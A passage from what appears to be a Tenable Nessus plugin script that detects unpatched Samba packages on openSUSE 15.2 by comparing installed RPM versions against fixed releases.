value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-python3-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-core-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debugsource-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", 